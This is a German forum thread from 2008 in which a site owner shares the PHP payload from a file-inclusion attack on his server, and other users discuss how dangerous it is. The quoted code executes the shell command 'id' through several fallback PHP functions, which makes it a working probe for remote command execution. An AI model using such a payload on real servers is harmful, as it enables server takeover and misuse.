Hacker ?!

**unset** · 01.07.2008, 22:48

Und jetzt?

**dunixphp** · 01.07.2008, 23:17

nix!

ich finde es nur sehr spannend

**unset** · 01.07.2008, 23:22

Ich finds eher gähnend langweilig. Hat er denn wenigstens Erfolg gehabt. Dann kann man dich wenigstens darauf hinweisen, deine Lücken zu stopfen, statt uns hier mit deinen Trivialitäten zu nerven.

**dunixphp** · 02.07.2008, 09:50

tut mir leid

Ich finde es trotzdem spannend

**UzumakiNaruto** · 02.07.2008, 10:05

ich würde mal eher behaupten dort will jemand links in deine datenbank schreiben

**dunixphp** · 02.07.2008, 10:44

Der will Befehle auf dem Server ausführen

PHP-Code:


echo "Mic22";

$cmd="id";

$eseguicmd=ex($cmd);

echo $eseguicmd;

function ex($cfe){

$res = '';

if (!empty($cfe)){

if(function_exists('exec')){

@exec($cfe,$res);

$res = join("\n",$res);

}

elseif(function_exists('shell_exec')){

$res = @shell_exec($cfe);

}

elseif(function_exists('system')){

@ob_start();

@system($cfe);

$res = @ob_get_contents();

@ob_end_clean();

}

elseif(function_exists('passthru')){

@ob_start();

@passthru($cfe);

$res = @ob_get_contents();

@ob_end_clean();

}

elseif(@is_resource($f = @popen($cfe,"r"))){

$res = "";

while(!@feof($f)) { $res .= @fread($f,1024); }

@pclose($f);

}}

return $res;

}

exit;

**Flip7** · 02.07.2008, 13:33

Auf http://fuckyou.fileave.com/ würden Spamer schöne Adressen finden :-D

und die niederländische Seite da verkauft oder vermietet Bagger :-D

komische Leute, aber @dunixphp JA das sind Hackerangriffe, jedoch irgendwie harmlose...

Ist aber ganz lustig alles zu überwachen, gell

**onemorenerd** · 02.07.2008, 15:51

Als harmlos würde ich das nicht bezeichnen. Die Art des Angriffs mag banal sein, aber wenn es klappt, hat man eine PHP-Shell mit der man ziemlichen Schaden anrichten kann. Die Erfolgschancen für den Angreifer dürften nicht schlecht stehen, wenn man bedenkt wieviele Leute hier immer wieder ungefiltert GET-Parameter für include nutzen.

**h3ll** · 02.07.2008, 16:10

Original geschrieben von onemorenerd
Als harmlos würde ich das nicht bezeichnen. Die Art des Angriffs mag banal sein, aber wenn es klappt, hat man eine PHP-Shell mit der man ziemlichen Schaden anrichten kann. Die Erfolgschancen für den Angreifer dürften nicht schlecht stehen, wenn man bedenkt wieviele Leute hier immer wieder ungefiltert GET-Parameter für include nutzen.

Was meiner Meinung nach genauso fahrlässig ist wie ein Auto mit geöffneten Fenstern abzustellen und darin den Zündschlüssel stecken zu lassen.

**unset** · 02.07.2008, 16:17

Wobei in dem Fall nur der Besitzer des Autos den Schaden hat. Unter einer gekaperten Kiste leiden im Zweifelsfall wesentlich mehr Menschen.

**dunixphp** · 02.07.2008, 18:13

harmlos mit Sicherheit nicht!
*Lehrgeld bereits bezahlt*

Hacker ?!

Hacker ?!

Kommentar

Kommentar

Kommentar

Kommentar

Kommentar

Kommentar

Kommentar

Kommentar

Kommentar

Kommentar

Kommentar

Wird geladen... Bitte warte.

Hacker ?!

Hacker ?!

Kommentar

Kommentar

Kommentar

Kommentar

Kommentar

Kommentar

Kommentar

Kommentar

Kommentar

Kommentar

Kommentar